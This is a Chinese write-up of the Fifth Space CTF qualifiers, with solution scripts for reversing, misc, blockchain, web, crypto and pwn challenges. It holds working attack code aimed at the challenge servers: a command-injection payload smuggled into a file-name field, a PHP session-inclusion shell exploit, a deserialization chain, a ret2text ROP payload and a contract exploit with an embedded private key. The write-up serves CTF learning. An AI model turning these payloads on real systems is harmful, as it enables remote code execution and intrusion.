第五空间CTF初赛wp

作者：手机用户2502934901 | 来源：互联网 | 2023-09-10 18:51

ReStrangeLanguage动调猜内存，发现是亦或。a=[0x53 ,0xF, 0x5A ,0x54, 0x50, 0x55, 0x3, 0x2, 0x0, 0x7, 0x56, 0x7, 0

Re

StrangeLanguage

动调猜内存，发现是亦或。

a=[0x53 ,0xF, 0x5A ,0x54, 0x50, 0x55, 0x3, 0x2, 0x0, 0x7, 0x56, 0x7, 0x7, 0x5B, 0x9, 0x0, 0x50, 0x5, 0x2, 0x3, 0x5D, 0x5C, 0x50, 0x51, 0x52, 0x54, 0x5A, 0x5F, 0x2, 0x57, 0x7, 0x34] for i in range(30,-1,-1): a[i]^=a[i+1] flag="" for i in range(32): flag+=chr(a[i]) print("flag{"+flag+"}")

Misc

签到

CheckIn

BabyMi

首先tshark提取一下usbdata的数据
tshark -r a.pcap -T fields -e usb.capdata | tr -s ‘\n’ > data_list

python脚本按行读取去除每行最后的换行。
result+=line[:-1]

利用010editor导入16进制保存即可。
之后diskgenius一下可以直接得到视频，拿到flag。

Alpha10

foremost后
双图盲水印。

记得flag应该是
flag{XqAe3QzK2ehD5fWv8jfBitPqHUw0}

Blockchain

CallBox

paradigm-CTF原题
具体可以看我的安全客投稿
https://www.anquanke.com/post/id/250115
这里只贴exp了。

import web3 from web3 import Web3,HTTPProvider from web3.auto import w3 import hashlib import json from Crypto.Util.number import * web3=Web3(HTTPProvider("http://114.115.157.63:8545/")) acct=web3.eth.account.from_key('0x107601f7600411eb7203286cf0c83aa4f18b336196c3c98a33dcbb3a49d89a3d') """abi=[ { "stateMutability": "payable", "type": "fallback" } ] opcode="6080604052348015600f57600080fd5b50605380601d6000396000f3fe60806040523273ffffffffffffffffffffffffffffffffffffffff16fffea2646970667358221220905d81ab00e22c4df5b3b4a0e06c36d582af1c1bda479c1f5d52b953fc13617064736f6c63430007000033" cOntract=web3.eth.contract(abi=abi,bytecode=opcode) construct_txn = contract.constructor().buildTransaction({ 'from': acct.address, 'nonce': web3.eth.getTransactionCount(acct.address), 'gas': 5000000, 'gasPrice': web3.toWei('21', 'gwei')}) signed=acct.signTransaction(construct_txn) tx_id=web3.eth.sendRawTransaction(signed.rawTransaction) print(tx_id.hex())""" #print(web3.eth.getTransactionReceipt('0xb04cf1ce18efe0007088ac00792d2c0fd2e159c156ab68eca5890edc2fd23d73')) # address2 : 0xcaF2f0A364B8D23787F63ed98590F65970b4C50b abi2=[ { "inputs": [], "stateMutability": "nonpayable", "type": "constructor" }, { "stateMutability": "payable", "type": "fallback" } ] """opcode="6080604052348015600f57600080fd5b5060838061001e6000396000f3fe6080604052600073caf2f0a364b8d23787f63ed98590f65970b4c50b6000806000806000855af19150508060325750604b565b3273ffffffffffffffffffffffffffffffffffffffff16ff5b00fea2646970667358221220cb8975fb237c4082d510ddec3bb377bd61c129f2794dfd25052e44f3c930257064736f6c63430007000033" cOntract=web3.eth.contract(abi=abi2,bytecode=opcode) construct_txn = contract.constructor().buildTransaction({ 'from': acct.address, 'nonce': web3.eth.getTransactionCount(acct.address), 'gas': 5000000, 'gasPrice': web3.toWei('21', 'gwei')}) signed=acct.signTransaction(construct_txn) tx_id=web3.eth.sendRawTransaction(signed.rawTransaction) import time time.sleep(2) print(web3.eth.getTransactionReceipt(tx_id)) """ #print(web3.eth.getTransactionReceipt('0xbb5d4dd2462e3a808fb3d52aabd8defe0472041971e6eec4b753417d0c4ce5dc')) # address 1 = 0xeeFDEed9E7A39965a397De6bbe31dfb314525b06 def get_txn(src, dst, datad,nonce, value=0, ): return { "from": src, "to": dst, "gasPrice": web3.toWei(1,'gwei'), "gas": 3000000, "value": web3.toWei(value,'wei'), "nonce": nonce,#web3.eth.getTransactionCount(src), "data": datad, 'chainId':8888 } """to_addr='0x9d629baE007F1B454A46fc03FA5FDedB335e5B18' data=long_to_bytes(0xc24fe950000000000000000000000000eeFDEed9E7A39965a397De6bbe31dfb314525b06) nOnce=web3.eth.getTransactionCount(acct.address) signed_txn = web3.eth.account.signTransaction(get_txn(acct.address, to_addr, data, nonce), acct.privateKey) txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex() print("hack"+txn_hash)""" print(web3.eth.getTransactionReceipt('0xc3de56cb62b665191cbc640b6a7a68ffa1d7c22e6aa4f577d0e1bc1d419c3827')) #print(web3.eth.getTransactionReceipt('0x9ed9c7f8899040de1f54fe911b27474c56b9f4f9e17374fe552e40bbe96c9f70'))

Web

WebFtp

扫到了/.git/下的一些东西
审计源码
/Readme/mytz.php
下可以act来控制一些动作
phpinfo()
即可拿到flag

PNG图片转换器

Ruby的open可以执行命令

import requests print(hex(ord('.')),hex(ord("/"))) res = requests.post(f"{url}/convert",data="file=echo bHMgLw== | base64 -d | sh;.png".encode("utf-8"),headers={"Content-Type":"application/x-www-form-urlencoded"},allow_redirects=False) print(res.content)

EasyCleanup

PHP SESSION LFI 一把梭了

import requests import threading class BasePHPSessionHelper: def __init__(self,host) -> None: self.host = host pass @staticmethod def createSession(upload_url,sess_name:str="ekitest"): while True: files = { "submit" : ("eki.png","GIF89awhatever","image/png") } data = {"PHP_SESSION_UPLOAD_PROGRESS" : "');?>" } headers = {'COOKIE':'PHPSESSID=' + sess_name} r = requests.post(upload_url,files = files,headers = headers,data=data) def sessionInclude(self,sess_name="ekitest"): #sessiOnPath= "/var/lib/php5/sess_" + sess_name sessiOnPath= f"/var/lib/php/sessions/sess_{sess_name}" upload_url = f"{self.host}/lfi.php" include_url = f"{self.host}/lfi.php?lfi={sessionPath}" headers = {'COOKIE':'PHPSESSID=' + sess_name} t = threading.Thread(target=self.createSession,args=(upload_url,sess_name)) t.setDaemon(True) t.start() while True: res = requests.post(include_url,headers=headers) if b'Eki' in res.content: print("[*] Get shell success.") break else: print("[-] retry.") return True import threading,requests host= "http://114.115.134.72:32770" class Exp(BasePHPSessionHelper): @staticmethod def createSession(upload_url,sess_name:str="ekitest"): while True: files = { "submit" : ("eki.png","GIF89awhatever","image/png") } data = {"PHP_SESSION_UPLOAD_PROGRESS" : "');?>" } headers = {'COOKIE':'PHPSESSID=' + sess_name} r = requests.post(upload_url,files = files,headers = headers,data=data) def sessionInclude(self,sess_name="ekitest"): #sessiOnPath= "/var/lib/php5/sess_" + sess_name #sessiOnPath= f"/var/lib/php/sessions/sess_{sess_name}" sessiOnPath= f"/tmp/sess_{sess_name}" upload_url = f"{self.host}/index.php" include_url = f"{self.host}/index.php?file={sessionPath}" headers = {'COOKIE':'PHPSESSID=' + sess_name} t = threading.Thread(target=self.createSession,args=(upload_url,sess_name)) t.setDaemon(True) t.start() while True: res = requests.post(include_url,headers=headers) if b'Included' in res.content: print("[*] Get shell success.") print(include_url,res.content) break else: print("[-] retry.") return True exp = Exp(host) exp.sessionInclude("g")

yet_another_mysql_injection

mysql quine

pklovecloud

随便反序列化好像就行了，

$heat = 1; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function setCinder($cinder){ $this->cinder = $cinder; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name();//here } } class ace { public $filename; public $openstack; public $docker; function echo_name() { $this->openstack = unserialize($this->docker); $this->openstack->neutron = $heat; if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; var_dump($file); if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } $b = new stdClass; $b->neutron = $heat; $b->nova = $heat; $a = new ace; $a->docker = $b; $a->filename = 'flag.php'; $exp = new acp; $exp->setCinder($a); var_dump(urlencode(serialize($exp))); $logData = unserialize(serialize($exp)); echo $logData; ?>

Crypto

ecc

第一个discrete_log直接出
第二个P的阶有一个大因子，但是太大了魔改一下ph的思路就可以
第三个是P的阶是p用smartattack

from Crypto.Util.number import * p = 146808027458411567 A = 46056180 B = 2316783294673 E = EllipticCurve(GF(p), [A, B]) P = E(119851377153561800, 50725039619018388, 1) Q = E(22306318711744209, 111808951703508717, 1) print(long_to_bytes(discrete_log(Q, P, operation='+')))

p = 1256438680873352167711863680253958927079458741172412327087203 A = 377999945830334462584412960368612 B = 604811648267717218711247799143415167229480 E = EllipticCurve(GF(p),[A,B]) P = E(550637390822762334900354060650869238926454800955557622817950, 700751312208881169841494663466728684704743091638451132521079, 1) Q = E(1152079922659509908913443110457333432642379532625238229329830, 819973744403969324837069647827669815566569448190043645544592, 1) print(factor(P.order()) ) factor_list = P.order().factor() factor_list = [i[0] ^ i[1] for i in factor_list] factor_list = factor_list[:-1] M_i = [P.order() // i for i in factor_list] a_i = [discrete_log(M_i[i] * Q, M_i[i] * P, factor_list[i], operation='+') for i in range(len(factor_list))] a = crt(a_i, factor_list) m = 1 for i in factor_list: m *= i # key = a + kk * m # K = a * G + kk * m * G # (K - a * G) = kk * (m * G) # a new ecdlp and bound is kk # kk is about 21 bit # so just use bsgs bound = (2 ^ 56) // m kk = bsgs(m * P, Q - a * P, (bound // 2, bound), operation='+') key = a + kk * m print(bytes.fromhex(hex(key)[2:]))

def HenselLift(P,p,prec): E = P.curve() Eq = E.change_ring(QQ) Ep = Eq.change_ring(Qp(p,prec)) x_P,y_P = P.xy() x_lift = ZZ(x_P) y_lift = ZZ(y_P) x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6') f(a1,a2,a3,a4,a6,x,y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6 g(y) = f(ZZ(Eq.a1()),ZZ(Eq.a2()),ZZ(Eq.a3()),ZZ(Eq.a4()),ZZ(Eq.a6()),ZZ(x_P),y) gDiff = g.diff() for i in range(1,prec): uInv = ZZ(gDiff(y=y_lift)) u = uInv.inverse_mod(p^i) y_lift = y_lift - u*g(y_lift) y_lift = ZZ(Mod(y_lift,p^(i+1))) y_lift = y_lift+O(p^prec) return Ep([x_lift,y_lift]) def SmartAttack(P,Q,p,prec): E = P.curve() Eqq = E.change_ring(QQ) Eqp = Eqq.change_ring(Qp(p,prec)) P_Qp = HenselLift(P,p,prec) Q_Qp = HenselLift(Q,p,prec) p_times_P = p*P_Qp p_times_Q=p*Q_Qp x_P,y_P = p_times_P.xy() x_Q,y_Q = p_times_Q.xy() phi_P = -(x_P/y_P) phi_Q = -(x_Q/y_Q) k = phi_Q/phi_P k = Mod(k,p) return k

secrets

像个背包？构造下面的格就出了

p = 7920896218820943056702891053785968782942077704655549145065876361907786355057528237061821280280635146678227702121299090049267547565989625947956850127609879 a = [5159988341992193282580685525745512910538614629527934692498086718630359717994948104271635300443062627349528208661883545208904466234606731357843882012950859, 6335284643679900918720817621948758994408045076082703123014899812263624185305268879304513104269749790342063146501376008458665966651095670658606928517201721, 6076126683981038494289949541335915228950649182831013867715530414744306299113418155691977393469353865827225836608438360416489035800225275307683760086087019] c = 2262305826865903827781721021939132022253239409560318732728105425007767005455109451147816015758855318893496902119172860305961200859254558917933621119030425 just = 2 ^ 167 L = Matrix(ZZ, [[ 2, 0, 0, 0, p * just], [ 0, 2^160, 0, 0, a[0] * just], [ 0, 0, 2^224, 0, a[1] * just], [ 0, 0, 0, 2^256, a[2] * just], [ 2^320, 2^320, 2^320, 2^320, c * just] ]) res = list(L.LLL()[0])[1:4] res = [(2^320 - res[i]) // L[i + 1][i + 1] for i in range(3)] from gmpy2 import iroot import hashlib from Crypto.Cipher import AES from Crypto.Util.number import * secrets = [0 for i in range(3)] secrets[1] = iroot(res[0] // res[1], int(2))[0] secrets[0] = iroot(res[2], int(2))[0] secrets[2] = iroot(res[1] // secrets[0], int(2))[0] secrets = [int(_) for _ in secrets] print(secrets) key = hashlib.sha256(str(secrets).encode()).digest() cipher = AES.new(key, AES.MODE_ECB) enc_flag = cipher.decrypt(long_to_bytes(0x99ff236d4f1e020e6c83cc154e20f71eb510913056d47344b44a87f98664efd3)) print(enc_flag)

doublesage

题目有问题
随便传 5个数字就可以过第一个
再传15个就能过第二个
然后就有flag了

下面的exp也不对看着题目说要 1 * 23 的向量所以瞎传了个噪声回去
（反正全0也能出）
有问题这题

from pwn import * import json context.log_level = 'debug' ip, port = '122.112.210.186', 51436 def deal(s): return json.loads(s.replace(' ', ' ').replace(' ', ' ').replace('[ ', '[').replace(' ', ',').replace('\n', '')) io = remote(ip, port) io.recvuntil('23 :\n') A = [] for i in range(5): A.append(deal(io.recvline().decode()) + [0]) io.recvuntil('23 :\n') b = deal(io.recvline().decode()) + [290] A = Matrix(ZZ, A) b = Matrix(ZZ, b) mid = block_matrix([29 * identity_matrix(23), Matrix(ZZ, [0] * 23).T], ncols=2) L = block_matrix([A, mid, b], nrows=3, subdivide=False) B = L.LLL() print(B) E = Matrix(B[-1]).T[:-1].T io.recvuntil('29 :\n') io.sendline(E.str()) print(io.recvline()) # io.interactive() io.recvline() io.recvline() io.recvuntil('143 :\n') A = [] for i in range(15): # print('###########') aaaa = io.recvuntil('\n') # print(aaaa) A.append(deal(aaaa.decode()) + [0]) io.recvuntil('143 :\n') b = deal(io.recvuntil(']').decode()) + [227] A = Matrix(ZZ, A) b = Matrix(ZZ, b) mid = block_matrix([227 * identity_matrix(143), Matrix(ZZ, [0] * 143).T], ncols=2) L = block_matrix([A, mid, b], nrows=3, subdivide=False) print('start LLL') B = L.LLL() print('done. #########') print(B) E = Matrix(B[-1]).T[:-1].T io.recvuntil('227 :\n') io.sendline(E.str()) print(io.recvline())

Pwn

Pwn1

ret2text

#coding:utf-8 from pwn import * import subprocess, sys, os sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x, y) elf_path = './pwn' ip = '139.9.123.168' port = 32548 remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6' context(os='linux', arch='amd64') context.log_level = 'debug' def run(local = 1): global elf global p if local == 1: elf = ELF(elf_path, checksec = False) p = elf.process() else: p = remote(ip, port) run(0) rdi = 0x000000000040120b payload = 'a'*144+p64(0)+p64(rdi)+p64(0x403408)+p64(0x401030) p.send(payload) p.interactive()

推荐阅读

int
关于cuowu类的错误提示和使用AdjustmentListener的问题

本文讨论了一个关于cuowu类的问题，作者在使用cuowu类时遇到了错误提示和使用AdjustmentListener的问题。文章提供了16个解决方案，并给出了两个可能导致错误的原因。 ... [详细]

蜡笔小新 2023-12-13 22:09:56
int
java 模拟get post请求_Java后台模拟发送http的get和post请求，并测试

个人学习使用：谨慎参考1Client类importcom.thoughtworks.gauge.Step;importcom.thoughtworks.gauge.T ... [详细]

蜡笔小新 2023-12-13 14:20:23
int
如何从列表中删除所有零？

本文介绍了如何使用python从列表中删除所有的零，并将结果以列表形式输出，同时提供了示例格式。 ... [详细]

蜡笔小新 2023-12-13 13:02:00
int
[大整数乘法] java代码实现

本文介绍了使用java代码实现大整数乘法的过程，同时也涉及到大整数加法和大整数减法的计算方法。通过分治算法来提高计算效率，并对算法的时间复杂度进行了研究。详细代码实现请参考文章链接。 ... [详细]

蜡笔小新 2023-12-13 11:21:32
usb
Win10 64位旗舰版的优势及特点详解

本文详细介绍了Win10 64位旗舰版的优势及特点，包括更安全的源安装盘、永久激活方式、稳定性和硬件驱动的集成，以及人性化的维护工具和分区功能。通过阅读本文，您将了解到Win10 64位旗舰版相比其他版本的优势和特点。 ... [详细]

蜡笔小新 2023-12-12 16:10:37
int
JDK源码学习之HashTable(附带面试题)的学习笔记

本文介绍了JDK源码学习之HashTable(附带面试题)的学习笔记，包括HashTable的定义、数据类型、与HashMap的关系和区别。文章提供了干货，并附带了其他相关主题的学习笔记。 ... [详细]

蜡笔小新 2023-12-12 13:05:17
int
开发笔记:加密&json&StringIO模块&BytesIO模块

篇首语：本文由编程笔记#小编为大家整理，主要介绍了加密&json&StringIO模块&BytesIO模块相关的知识，希望对你有一定的参考价值。一、加密加密 ... [详细]

蜡笔小新 2023-12-14 15:18:35
int
Spring特性实现接口多类的动态调用详解

本文详细介绍了如何使用Spring特性实现接口多类的动态调用。通过对Spring IoC容器的基础类BeanFactory和ApplicationContext的介绍，以及getBeansOfType方法的应用，解决了在实际工作中遇到的接口及多个实现类的问题。同时，文章还提到了SPI使用的不便之处，并介绍了借助ApplicationContext实现需求的方法。阅读本文，你将了解到Spring特性的实现原理和实际应用方式。 ... [详细]

蜡笔小新 2023-12-14 03:24:19
int
Java高并发程序设计学习-线程安全的概念与synchronized

本文介绍了Java高并发程序设计中线程安全的概念与synchronized关键字的使用。通过一个计数器的例子，演示了多线程同时对变量进行累加操作时可能出现的问题。最终值会小于预期的原因是因为两个线程同时对变量进行写入时，其中一个线程的结果会覆盖另一个线程的结果。为了解决这个问题，可以使用synchronized关键字来保证线程安全。 ... [详细]

蜡笔小新 2023-12-13 15:43:03
int
南邮ctf-web的writeup

本文介绍了南邮ctf-web的writeup，包括签到题和md5 collision。在CTF比赛和渗透测试中，可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型，可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]

蜡笔小新 2023-12-13 10:58:55
int
Golang条件编译的必要性及实现方法

本文介绍了在多平台下进行条件编译的必要性，以及具体的实现方法。通过示例代码展示了如何使用条件编译来实现不同平台的功能。最后总结了只要接口相同，不同平台下的编译运行结果也会相同。 ... [详细]

蜡笔小新 2023-12-13 09:38:06
int
模板引擎StringTemplate的使用方法和特点

本文介绍了模板引擎StringTemplate的使用方法和特点，包括强制Model和View的分离、Lazy-Evaluation、Recursive enable等。同时，还介绍了StringTemplate语法中的属性和普通字符的使用方法，并提供了向模板填充属性的示例代码。 ... [详细]

蜡笔小新 2023-12-11 21:45:03
int
Java程序设计第4周学习总结及注释应用的开发笔记

本文由编程笔记#小编为大家整理，主要介绍了201521123087《Java程序设计》第4周学习总结相关的知识，包括注释的应用和使用类的注释与方法的注释进行注释的方法，并在Eclipse中查看。摘要内容大约为150字，提供了一定的参考价值。 ... [详细]

蜡笔小新 2023-12-11 21:21:22
int
to_a和to_ary有什么区别？ - What's the difference between to_a and to_ary?

Whatsthedifferencebetweento_aandto_ary?to_a和to_ary有什么区别？ ... [详细]

蜡笔小新 2023-12-11 19:30:04
int
MFC动态创建窗口的实现方法及注意事项

本文介绍了在MFC下利用C++和MFC的特性动态创建窗口的方法，包括继承现有的MFC类并加以改造、插入工具栏和状态栏对象的声明等。同时还提到了窗口销毁的处理方法。本文详细介绍了实现方法并给出了相关注意事项。 ... [详细]

蜡笔小新 2023-12-11 15:09:27

手机用户2502934901

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章